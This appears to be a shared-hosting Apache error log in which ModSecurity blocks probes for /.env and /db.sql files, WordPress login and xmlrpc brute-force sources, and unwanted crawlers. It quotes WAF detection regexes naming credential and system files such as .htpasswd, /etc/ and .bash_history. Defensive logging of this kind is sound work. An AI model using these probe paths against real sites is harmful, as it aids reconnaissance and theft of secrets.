[Tue May 26 15:37:21.049768 2026] [security2:error] [pid 724639:tid 724738] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/db.sql"] [unique_id "ahVw2RKJRbiNp3eWdT2P1gAA72I"]
[Tue May 26 15:37:21.194888 2026] [security2:error] [pid 724639:tid 724879] [client 94.26.106.125:65090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rotaract4281.org.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVw2RKJRbiNp3eWdT2P3QAAAPM"], referer: https://www.facebook.com/
[Tue May 26 15:37:21.351432 2026] [core:error] [pid 724639:tid 724673] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:21.351466 2026] [core:error] [pid 724639:tid 724673] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:21.508991 2026] [security2:error] [pid 724639:tid 724776] [client 94.26.106.125:49622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rotaract4281.org.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVw2RKJRbiNp3eWdT2P6AAAAIw"], referer: https://www.facebook.com/
[Tue May 26 15:37:21.571642 2026] [security2:error] [pid 724639:tid 724816] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw2RKJRbiNp3eWdT2P3AAAALQ"]
[Tue May 26 15:37:21.634020 2026] [core:error] [pid 724639:tid 724677] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:21.634050 2026] [core:error] [pid 724639:tid 724677] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:22.015908 2026] [core:error] [pid 724639:tid 724719] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:22.015943 2026] [core:error] [pid 724639:tid 724719] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:22.370559 2026] [core:error] [pid 724639:tid 724665] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:22.370595 2026] [core:error] [pid 724639:tid 724665] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:22.505441 2026] [security2:error] [pid 724639:tid 724790] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw2hKJRbiNp3eWdT2P_gAAAJo"]
[Tue May 26 15:37:22.719483 2026] [core:error] [pid 724639:tid 724683] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:22.719502 2026] [core:error] [pid 724639:tid 724683] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:23.061232 2026] [core:error] [pid 724639:tid 724684] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:23.061269 2026] [core:error] [pid 724639:tid 724684] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:23.438270 2026] [core:error] [pid 724639:tid 724709] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:23.438295 2026] [core:error] [pid 724639:tid 724709] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:23.749189 2026] [security2:error] [pid 724639:tid 724808] [client 78.46.190.63:8018] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVw2xKJRbiNp3eWdT2QFQAAAKw"], referer: http://ucdc.co.in/
[Tue May 26 15:37:24.348132 2026] [security2:error] [pid 724639:tid 724785] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw2xKJRbiNp3eWdT2QNAAAAJU"]
[Tue May 26 15:37:25.147662 2026] [security2:error] [pid 724639:tid 724860] [client 176.65.139.239:18726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env"] [unique_id "ahVw3RKJRbiNp3eWdT2QTQAAAOA"]
[Tue May 26 15:37:25.236817 2026] [core:error] [pid 724639:tid 724676] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:25.236847 2026] [core:error] [pid 724639:tid 724676] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:25.461367 2026] [security2:error] [pid 724639:tid 724802] [client 176.65.139.229:29512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/.env"] [unique_id "ahVw3RKJRbiNp3eWdT2QWAAAAKY"]
[Tue May 26 15:37:25.710998 2026] [core:error] [pid 724639:tid 724681] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:25.711027 2026] [core:error] [pid 724639:tid 724681] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:26.081131 2026] [security2:error] [pid 724639:tid 724883] [client 223.123.38.127:15201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw3RKJRbiNp3eWdT2QYwAAAPc"]
[Tue May 26 15:37:26.081276 2026] [security2:error] [pid 724639:tid 724883] [client 223.123.38.127:15201] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw3RKJRbiNp3eWdT2QYwAAAPc"]
[Tue May 26 15:37:26.096944 2026] [core:error] [pid 724639:tid 724696] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:26.096972 2026] [core:error] [pid 724639:tid 724696] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:26.475222 2026] [core:error] [pid 724639:tid 724708] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:26.475251 2026] [core:error] [pid 724639:tid 724708] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:26.494674 2026] [security2:error] [pid 724639:tid 724876] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw3hKJRbiNp3eWdT2QcgAAAPA"]
[Tue May 26 15:37:26.705747 2026] [security2:error] [pid 724639:tid 724820] [client 47.128.53.180:55562] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cagmedya.com"] [uri "/robots.txt"] [unique_id "ahVw3hKJRbiNp3eWdT2QgQAAALg"]
[Tue May 26 15:37:27.036856 2026] [core:error] [pid 724639:tid 724701] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.036880 2026] [core:error] [pid 724639:tid 724701] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.318330 2026] [core:error] [pid 724639:tid 724643] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.318353 2026] [core:error] [pid 724639:tid 724643] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.568257 2026] [core:error] [pid 724639:tid 724728] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.568762 2026] [core:error] [pid 724639:tid 724728] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.842201 2026] [core:error] [pid 724639:tid 724641] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:27.842224 2026] [core:error] [pid 724639:tid 724641] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:28.151890 2026] [core:error] [pid 724639:tid 724755] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:28.151918 2026] [core:error] [pid 724639:tid 724755] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:28.609272 2026] [core:error] [pid 724639:tid 724747] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:28.609311 2026] [core:error] [pid 724639:tid 724747] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:28.767808 2026] [security2:error] [pid 724639:tid 724860] [client 176.65.139.235:35502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env"] [unique_id "ahVw4BKJRbiNp3eWdT2REwAAAOA"]
[Tue May 26 15:37:29.386907 2026] [security2:error] [pid 724639:tid 724778] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw4BKJRbiNp3eWdT2RHwAAAI4"]
[Tue May 26 15:37:31.128282 2026] [security2:error] [pid 724639:tid 724893] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw4hKJRbiNp3eWdT2RYgAAAQE"]
[Tue May 26 15:37:31.776870 2026] [security2:error] [pid 724639:tid 724842] [client 89.124.113.81:58429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.113.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVw4xKJRbiNp3eWdT2RdgAAAM4"], referer: https://atreegroup.com/2022/12/15/9-styling-secrets-to-help-you-sell-your-home/
[Tue May 26 15:37:31.777081 2026] [security2:error] [pid 724639:tid 724842] [client 89.124.113.81:58429] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVw4xKJRbiNp3eWdT2RdgAAAM4"], referer: https://atreegroup.com/2022/12/15/9-styling-secrets-to-help-you-sell-your-home/
[Tue May 26 15:37:32.544486 2026] [security2:error] [pid 724639:tid 724788] [client 202.76.134.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw5BKJRbiNp3eWdT2RiAAAAJg"]
[Tue May 26 15:37:34.171226 2026] [security2:error] [pid 724639:tid 724818] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw5RKJRbiNp3eWdT2RtAAAALY"]
[Tue May 26 15:37:35.860680 2026] [security2:error] [pid 724639:tid 724864] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw5xKJRbiNp3eWdT2R3wAAAOQ"]
[Tue May 26 15:37:35.927076 2026] [security2:error] [pid 724639:tid 724786] [client 103.247.13.142:57312] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahVw5xKJRbiNp3eWdT2R6gAAAJY"]
[Tue May 26 15:37:36.716476 2026] [security2:error] [pid 724639:tid 724769] [client 103.247.13.142:55936] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahVw6BKJRbiNp3eWdT2SAwAAAIU"]
[Tue May 26 15:37:38.528120 2026] [security2:error] [pid 724639:tid 724840] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw6hKJRbiNp3eWdT2SIwAAAMw"]
[Tue May 26 15:37:40.767534 2026] [security2:error] [pid 724639:tid 724838] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw7BKJRbiNp3eWdT2SYgAAAMo"]
[Tue May 26 15:37:43.051762 2026] [security2:error] [pid 724639:tid 724893] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw7hKJRbiNp3eWdT2SkwAAAQE"]
[Tue May 26 15:37:44.330105 2026] [security2:error] [pid 724639:tid 724826] [client 5.9.120.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVw8BKJRbiNp3eWdT2SwgAAAL4"]
[Tue May 26 15:37:44.683766 2026] [security2:error] [pid 724639:tid 724831] [client 223.123.38.127:15203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw8BKJRbiNp3eWdT2SzAAAAMM"]
[Tue May 26 15:37:44.686549 2026] [security2:error] [pid 724639:tid 724831] [client 223.123.38.127:15203] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw8BKJRbiNp3eWdT2SzAAAAMM"]
[Tue May 26 15:37:45.449586 2026] [security2:error] [pid 724639:tid 724811] [client 5.9.120.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVw8RKJRbiNp3eWdT2S4gAAAK8"]
[Tue May 26 15:37:46.187061 2026] [security2:error] [pid 724639:tid 724871] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw8RKJRbiNp3eWdT2S7AAAAOs"]
[Tue May 26 15:37:48.024757 2026] [security2:error] [pid 724639:tid 724786] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw8xKJRbiNp3eWdT2TIAAAAJY"]
[Tue May 26 15:37:50.026983 2026] [security2:error] [pid 724639:tid 724770] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw9RKJRbiNp3eWdT2TgwAAAIY"]
[Tue May 26 15:37:52.395720 2026] [security2:error] [pid 724639:tid 724840] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw9xKJRbiNp3eWdT2T2wAAAMw"]
[Tue May 26 15:37:54.190398 2026] [security2:error] [pid 724639:tid 724866] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw-RKJRbiNp3eWdT2UTwAAAOY"]
[Tue May 26 15:37:54.255645 2026] [security2:error] [pid 724639:tid 724717] [remote 5.45.96.74:36338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVw-hKJRbiNp3eWdT2UYwAA4U0"]
[Tue May 26 15:37:54.341711 2026] [security2:error] [pid 724639:tid 724834] [client 74.7.175.156:41654] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVw-hKJRbiNp3eWdT2UbAAAxlc"]
[Tue May 26 15:37:55.513950 2026] [security2:error] [pid 724639:tid 724856] [client 223.123.38.127:15204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw-xKJRbiNp3eWdT2UgAAAANw"]
[Tue May 26 15:37:55.514043 2026] [security2:error] [pid 724639:tid 724856] [client 223.123.38.127:15204] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw-xKJRbiNp3eWdT2UgAAAANw"]
[Tue May 26 15:37:56.095973 2026] [security2:error] [pid 724639:tid 724896] [client 114.119.142.125:63529] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVw_BKJRbiNp3eWdT2UkwAAAQQ"], referer: https://www.thegoodsporting.com/
[Tue May 26 15:37:56.902387 2026] [security2:error] [pid 724639:tid 724894] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw_BKJRbiNp3eWdT2UoAAAAQI"]
[Tue May 26 15:37:57.159551 2026] [security2:error] [pid 724639:tid 724812] [client 85.208.96.197:17700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVw_RKJRbiNp3eWdT2UrQAAALA"]
